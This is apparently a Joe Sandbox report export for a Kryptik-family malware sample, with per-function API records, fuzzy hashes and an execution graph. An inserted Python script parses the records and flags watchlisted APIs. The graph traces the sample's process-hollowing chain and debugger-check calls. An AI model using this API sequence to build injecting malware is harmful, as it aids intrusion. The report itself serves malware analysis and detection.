                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 10005381
                                                              • _free.LIBCMT ref: 10005394
                                                              • _free.LIBCMT ref: 100053A5
                                                              • _free.LIBCMT ref: 100053B6
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                              • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                              • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                              • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe,00000104), ref: 10004C1D
                                                              • _free.LIBCMT ref: 10004CE8
                                                              • _free.LIBCMT ref: 10004CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                              • API String ID: 2506810119-3620008145
                                                              • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                              • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                              • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                              • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                              • __freea.LIBCMT ref: 100087D5
                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                              • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                              • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                              • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                              • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                              • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                              • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                              • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                              APIs
                                                              • _free.LIBCMT ref: 1000655C
                                                                • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                              • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                              • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                              • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: : $Se.
                                                              • API String ID: 4218353326-4089948878
                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341
                                                              • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                              • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                              • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                              • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
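The function records above (one "APIs / Memory Dump Source / Similarity" block per function, each carrying call sites, the API ID, the String ID, the API String ID used as a similarity key, and the fuzzy hashes) are easier to triage once parsed. The Python script below is an added example and not part of the Joe Sandbox report or its tooling: it parses such blocks into objects, groups them by the report's own API String ID (the two `_free$ErrorFreeHeapLast` functions above share 776569668-0) and flags functions that reach an analyst-chosen watchlist of APIs, here the dynamic-resolution and process-control calls seen in this section. `SAMPLE` is constructed from four of the records above, trimmed to a few lines each, and `WATCHLIST` is an assumption, not something the report defines; the hashing behind the ID fields is not reproduced, the IDs are used as given.

```python
"""Parse Joe Sandbox function records (the 'APIs' / 'Similarity' blocks in this
report) into objects, group them by the report's own 'API String ID' similarity key
and flag functions that touch a watchlist of APIs. Added example, not Joe Sandbox
tooling: SAMPLE is four trimmed blocks from this report; WATCHLIST is an assumption."""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000), ref: 10004B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
• FreeLibrary.KERNEL32(00000000), ref: 10004B8F
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 1000715C
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
• _free.LIBCMT ref: 100071B8
Similarity
• String ID:
• API String ID: 336800556-0
APIs
• _free.LIBCMT ref: 100091D0
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?), ref: 10005734
Similarity
• API ID: _free$ErrorFreeHeapLast
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 1000536F
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?), ref: 10005734
Similarity
• API ID: _free$ErrorFreeHeapLast
• API String ID: 776569668-0
"""

# "• Name.MODULE(args), ref: ADDR"; the args and the "Part of subcall" prefix are optional.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# "• Key: value" lines of the Similarity / Memory Dump Source sections.
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                        # call-site address from the report
    via_subcall: str | None = None  # callee address when reached indirectly

@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    def api_names(self, direct_only: bool = False) -> set[str]:
        return {c.name for c in self.calls if not (direct_only and c.via_subcall)}

def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split the export on its 'APIs' headers and parse each record."""
    blocks: list[FunctionBlock] = []
    current: FunctionBlock | None = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
        elif current is not None and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif current is not None and (m := FIELD_RE.match(line)):
            current.fields[m["key"]] = m["val"]
    return blocks

def group_by_similarity(blocks: list[FunctionBlock]) -> dict[str, list[FunctionBlock]]:
    """Functions sharing an 'API String ID' have identical API and string profiles."""
    groups: dict[str, list[FunctionBlock]] = defaultdict(list)
    for b in blocks:
        if key := b.fields.get("API String ID"):
            groups[key].append(b)
    return dict(groups)

WATCHLIST = {"GetProcAddress", "LoadLibraryExW", "NtQueryInformationProcess",
             "TerminateProcess", "RaiseException"}

def flag_blocks(blocks: list[FunctionBlock], watchlist: set[str] = WATCHLIST):
    """(block, sorted matched API names) for every block touching the watchlist."""
    return [(b, sorted(b.api_names() & watchlist)) for b in blocks if b.api_names() & watchlist]

if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    print({k: len(v) for k, v in group_by_similarity(parsed).items()})
    print([(names, [c.ref for c in b.calls if c.name in names]) for b, names in flag_blocks(parsed)])
```

Feed it the text export of a whole report instead of `SAMPLE` to see which functions cluster by API String ID and where the watchlisted calls sit; `api_names(direct_only=True)` drops the "Part of subcall function" entries so that a CRT helper such as RtlAllocateHeap reached through a subcall is not attributed to every caller.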

                                                              Execution Graph

                                                              Execution Coverage:11.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:313
                                                              Total number of Limit Nodes:13
                                                              execution_graph (rendered call graph not reproduced in the text export; only numeric node IDs, edges and node labels survive). Entry nodes and the API calls reachable from them, recovered from the node labels:
                                                              • 5317a50 -> 53150dc -> 5317cd0: PostMessageW
                                                              • 31b4668 -> 31b4759 -> 31b477d -> 31b4858 / 31b4868 -> 31b44c4 -> 31b58f8: CreateActCtxA
                                                              • 31baf10 -> 31bb008 -> 31bb240 / 31bb239: GetModuleHandleW
                                                              • 31bd2a0 -> 31bd2e6 -> 31bd470 / 31bd480 -> 31baef4 -> 31bd4e8: DuplicateHandle
                                                              • 77d4a70 -> 77d4a7c -> 77d79b0 / 77d79a0 -> 77d88e8 / 77d88d7 -> 77d896f / 77d8918 / 77d8928 -> 77d8df8 / 77d8de8 -> 77d8a18 -> 77d8f58: NtQueryInformationProcess
                                                              • 77d9760 -> 77d9784 -> 77d8a68 -> 77d9c40: OutputDebugStringW; 77d8a74 -> 77d9cf0: CloseHandle
                                                              • 312d01c -> 312d034 -> 5902c09 / 590115c -> 5902c69 / 5902c79 -> 5902d90 / 5902da0 / 5902e6c / 5901284 -> 5902e48 / 5902e58 / 5904293 -> 590435a: CallWindowProcW
                                                              • 53147ce -> 53146e9 -> 5316779 / 53167ee / 5316788 -> 5316cd2, 5316ba7, 5316bc9, 5316dc8, 5317129 (2 API calls each) and 5317275, 5316db4, 531701d, 53172a3, 5317068, 5316f2a (4 API calls each); the export is cut off here and does not name those APIs.
                                                              The graph export carries no call arguments, so the information class passed to NtQueryInformationProcess and the handles passed to DuplicateHandle and CloseHandle are not recoverable from this listing; the per-function API records above are the place to look for argument values.
5316f6d 2 API calls 45626->45639 45640 5316d2c 2 API calls 45626->45640 45641 5316e6f 6 API calls 45626->45641 45642 5316d4e 2 API calls 45626->45642 45643 531708e 2 API calls 45626->45643 45627->45601 45628->45627 45629->45627 45630->45627 45631->45627 45632->45627 45633->45627 45634->45627 45635->45627 45636->45627 45637->45627 45638->45627 45639->45627 45640->45627 45641->45627 45642->45627 45643->45627 45645 53167a2 45644->45645 45646 53167aa 45645->45646 45647 5316cd2 2 API calls 45645->45647 45648 5317275 4 API calls 45645->45648 45649 5316db4 4 API calls 45645->45649 45650 531701d 4 API calls 45645->45650 45651 53172a3 4 API calls 45645->45651 45652 5316ba7 2 API calls 45645->45652 45653 5317129 2 API calls 45645->45653 45654 5316bc9 2 API calls 45645->45654 45655 5316dc8 2 API calls 45645->45655 45656 5317068 4 API calls 45645->45656 45657 5316f2a 4 API calls 45645->45657 45658 5316f6d 2 API calls 45645->45658 45659 5316d2c 2 API calls 45645->45659 45660 5316e6f 6 API calls 45645->45660 45661 5316d4e 2 API calls 45645->45661 45662 531708e 2 API calls 45645->45662 45646->45601 45647->45646 45648->45646 45649->45646 45650->45646 45651->45646 45652->45646 45653->45646 45654->45646 45655->45646 45656->45646 45657->45646 45658->45646 45659->45646 45660->45646 45661->45646 45662->45646 45664 5316cdf 45663->45664 45771 53142a0 45664->45771 45775 5314295 45664->45775 45669 5317094 45668->45669 45779 5313992 45669->45779 45783 5313998 45669->45783 45670 53170ba 45670->45607 45674 5316d35 45673->45674 45675 5317527 45674->45675 45677 5313992 ResumeThread 45674->45677 45678 5313998 ResumeThread 45674->45678 45675->45607 45676 53170ba 45676->45607 45677->45676 45678->45676 45787 5313f50 45679->45787 45791 5313f58 45679->45791 45680 5316e8d 45683 5314018 WriteProcessMemory 45680->45683 45795 5314011 45680->45795 45681 5316eef 45684 5314011 WriteProcessMemory 45681->45684 45799 5314018 45681->45799 45803 5313e80 45681->45803 45807 5313e78 45681->45807 45683->45681 
45684->45681 45691 5316d35 45690->45691 45692 5317527 45691->45692 45694 5313992 ResumeThread 45691->45694 45695 5313998 ResumeThread 45691->45695 45692->45607 45693 53170ba 45693->45607 45694->45693 45695->45693 45697 5316f79 45696->45697 45699 5314011 WriteProcessMemory 45697->45699 45700 5314018 WriteProcessMemory 45697->45700 45698 5317219 45699->45698 45700->45698 45702 5316f37 45701->45702 45703 5316d35 45702->45703 45704 53170ba 45702->45704 45705 5313e80 Wow64SetThreadContext 45702->45705 45706 5313e78 Wow64SetThreadContext 45702->45706 45703->45704 45707 5313992 ResumeThread 45703->45707 45708 5313998 ResumeThread 45703->45708 45704->45607 45705->45702 45706->45702 45707->45704 45708->45704 45710 5317075 45709->45710 45811 5314100 45710->45811 45815 5314108 45710->45815 45711 5317527 45711->45607 45712 5316d35 45712->45711 45716 5313992 ResumeThread 45712->45716 45717 5313998 ResumeThread 45712->45717 45713 53170ba 45713->45607 45716->45713 45717->45713 45719 5316dd8 45718->45719 45721 5314011 WriteProcessMemory 45719->45721 45722 5314018 WriteProcessMemory 45719->45722 45720 5316f62 45720->45607 45721->45720 45722->45720 45724 5316bb3 45723->45724 45724->45607 45725 5316d0d 45724->45725 45726 53142a0 CreateProcessA 45724->45726 45727 5314295 CreateProcessA 45724->45727 45725->45607 45726->45725 45727->45725 45729 53170a6 45728->45729 45730 53170ba 45729->45730 45731 5313992 ResumeThread 45729->45731 45732 5313998 ResumeThread 45729->45732 45730->45607 45731->45730 45732->45730 45734 5316bb3 45733->45734 45735 5316d0d 45734->45735 45736 53142a0 CreateProcessA 45734->45736 45737 5314295 CreateProcessA 45734->45737 45735->45607 45736->45735 45737->45735 45739 5316eef 45738->45739 45739->45738 45740 5313e80 Wow64SetThreadContext 45739->45740 45741 5313e78 Wow64SetThreadContext 45739->45741 45742 5314011 WriteProcessMemory 45739->45742 45743 5314018 WriteProcessMemory 45739->45743 45740->45739 45741->45739 45742->45739 45743->45739 45745 5317023 45744->45745 
45751 5314011 WriteProcessMemory 45745->45751 45752 5314018 WriteProcessMemory 45745->45752 45746 5316eef 45747 5314011 WriteProcessMemory 45746->45747 45748 5314018 WriteProcessMemory 45746->45748 45749 5313e80 Wow64SetThreadContext 45746->45749 45750 5313e78 Wow64SetThreadContext 45746->45750 45747->45746 45748->45746 45749->45746 45750->45746 45751->45746 45752->45746 45754 5316dc1 45753->45754 45758 5314100 ReadProcessMemory 45754->45758 45759 5314108 ReadProcessMemory 45754->45759 45755 5316d35 45756 5317527 45755->45756 45760 5313992 ResumeThread 45755->45760 45761 5313998 ResumeThread 45755->45761 45756->45607 45757 53170ba 45757->45607 45758->45755 45759->45755 45760->45757 45761->45757 45763 5317290 45762->45763 45767 5314100 ReadProcessMemory 45763->45767 45768 5314108 ReadProcessMemory 45763->45768 45764 5317527 45764->45607 45765 5316d35 45765->45764 45769 5313992 ResumeThread 45765->45769 45770 5313998 ResumeThread 45765->45770 45766 53170ba 45766->45607 45767->45765 45768->45765 45769->45766 45770->45766 45772 5314329 CreateProcessA 45771->45772 45774 53144eb 45772->45774 45776 5314329 CreateProcessA 45775->45776 45778 53144eb 45776->45778 45780 5313998 ResumeThread 45779->45780 45782 5313a09 45780->45782 45782->45670 45784 53139d8 ResumeThread 45783->45784 45786 5313a09 45784->45786 45786->45670 45788 5313f58 VirtualAllocEx 45787->45788 45790 5313fd5 45788->45790 45790->45680 45792 5313f98 VirtualAllocEx 45791->45792 45794 5313fd5 45792->45794 45794->45680 45796 5314018 WriteProcessMemory 45795->45796 45798 53140b7 45796->45798 45798->45681 45800 5314060 WriteProcessMemory 45799->45800 45802 53140b7 45800->45802 45802->45681 45804 5313ec5 Wow64SetThreadContext 45803->45804 45806 5313f0d 45804->45806 45806->45681 45808 5313ec5 Wow64SetThreadContext 45807->45808 45810 5313f0d 45808->45810 45810->45681 45812 5314108 ReadProcessMemory 45811->45812 45814 5314197 45812->45814 45814->45712 45816 5314153 ReadProcessMemory 45815->45816 45818 5314197 
45816->45818 45818->45712
APIs
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 077D8FD7
Memory Dump Source
• Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0
• Opcode ID: 9fb3d353ab03e0f6be2f076cab684e38d3450505fbb71a6180d520d32d597b2c
• Instruction ID: 59eb488a13696f8730c6fa79bd65755784bbce349cf54ef46e9b1fcac53f1082
• Opcode Fuzzy Hash: 9fb3d353ab03e0f6be2f076cab684e38d3450505fbb71a6180d520d32d597b2c
• Instruction Fuzzy Hash: F521EFB5900259EFCB10DF9AD884ADEFBF5FB58310F10842AE918A7310C375A944CFA5
APIs
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 077D8FD7
Memory Dump Source
• Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0
• Opcode ID: e55692b8167d91e186d0590aa6b311e775f3083a806e13611f488d834a393c3d
• Instruction ID: 4a8102c00ce53a2588696eed47c63bd26661994613a27429963635e750af2db7
• Opcode Fuzzy Hash: e55692b8167d91e186d0590aa6b311e775f3083a806e13611f488d834a393c3d
• Instruction Fuzzy Hash: 7D21EDB5900359EFCB10DF9AD884ADEFBF5FB58310F10842AEA18A7210C375A944CFA5

Control-flow Graph (rendered graph omitted; function at 5314295)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 053144D6
Memory Dump Source
• Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: a324ed52a10846376d0055a8b386fb31c0609f9213cdb6e77527be7ea1851405
• Instruction ID: d1778d2c56ed62b6f77e7ca7dbc0e94c8ea02c97a2a0316b6aa9f1258a320344
• Opcode Fuzzy Hash: a324ed52a10846376d0055a8b386fb31c0609f9213cdb6e77527be7ea1851405
• Instruction Fuzzy Hash: 93A15B71D00219DFDF14CFA8C841BEDBBB2BF48310F1485A9E809A7290DBB49995CF95

Control-flow Graph (rendered graph omitted; function at 53142a0)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 053144D6
Memory Dump Source
• Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 30fff3d94b309b91917eb2cf136d9db26b7094a850f3139abea39ae782b9e294
• Instruction ID: 0c818876cb7a17eefe1c60ff4ac47191c7a3b7b19dc8c6dd0efbe0b6dbb200f4
• Opcode Fuzzy Hash: 30fff3d94b309b91917eb2cf136d9db26b7094a850f3139abea39ae782b9e294
• Instruction Fuzzy Hash: 6A915A71D002199FDF24DFA9C841BEDBBB2BF48310F1485A9E809A7280DBB49995CF95

Control-flow Graph (rendered graph omitted; function at 31bb008)
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 031BB25E
Memory Dump Source
• Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: a305647c433140a7306b86d71975badc2b8fcfa58b65abd072908ddc9e32f117
• Instruction ID: d106792aa6bd5d6ec10f1c3ea82e9af399c0919e2e99e1f97ee373e4b7389136
• Opcode Fuzzy Hash: a305647c433140a7306b86d71975badc2b8fcfa58b65abd072908ddc9e32f117
• Instruction Fuzzy Hash: 0D7145B0A04B058FDB24DF2AD4417AABBF5FF88300F04896DD49ADBA50DB75E945CB90

Control-flow Graph (rendered graph omitted; function at 5901284)
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 05904381
Memory Dump Source
• Source File: 0000000A.00000002.2127651718.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5900000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: c629be613e130204bba311bf7a45ff535d78562c1129d80f28389a8d3e3c58cb
• Instruction ID: 95c03bbd480314a74bc55a1ca034708c058c95dfd43494bfe86f5f1484567f85
• Opcode Fuzzy Hash: c629be613e130204bba311bf7a45ff535d78562c1129d80f28389a8d3e3c58cb
• Instruction Fuzzy Hash: BE4138B5900305DFCB14CF99C888AAAFBF6FF88314F24D859D619A7361D370A840CBA0
APIs
• CreateActCtxA.KERNEL32(?), ref: 031B59A9
Memory Dump Source
• Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: b436c0c56105ede63d75fbe96dfcf16309bf796d6c3fcaceb4b4888a773ecb4b
• Instruction ID: 65aa24c53a1e3f2cfe00a8d91f65f15a19af9f2ec7a9e4f0471c343cb293e4b0
• Opcode Fuzzy Hash: b436c0c56105ede63d75fbe96dfcf16309bf796d6c3fcaceb4b4888a773ecb4b
• Instruction Fuzzy Hash: 8541CFB0C00719CBDB24DFAAC984ADDBBF6FF49304F24806AD508AB251DB756949CF90
APIs
• CreateActCtxA.KERNEL32(?), ref: 031B59A9
Memory Dump Source
• Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: fb50f7353e31376003bf3c1acba42cf9a9788542c225634c49f67cdcaf2728dc
• Instruction ID: e48109ece924089c9ab61021b9913ab44163b01cae932b29514114719ac1aca9
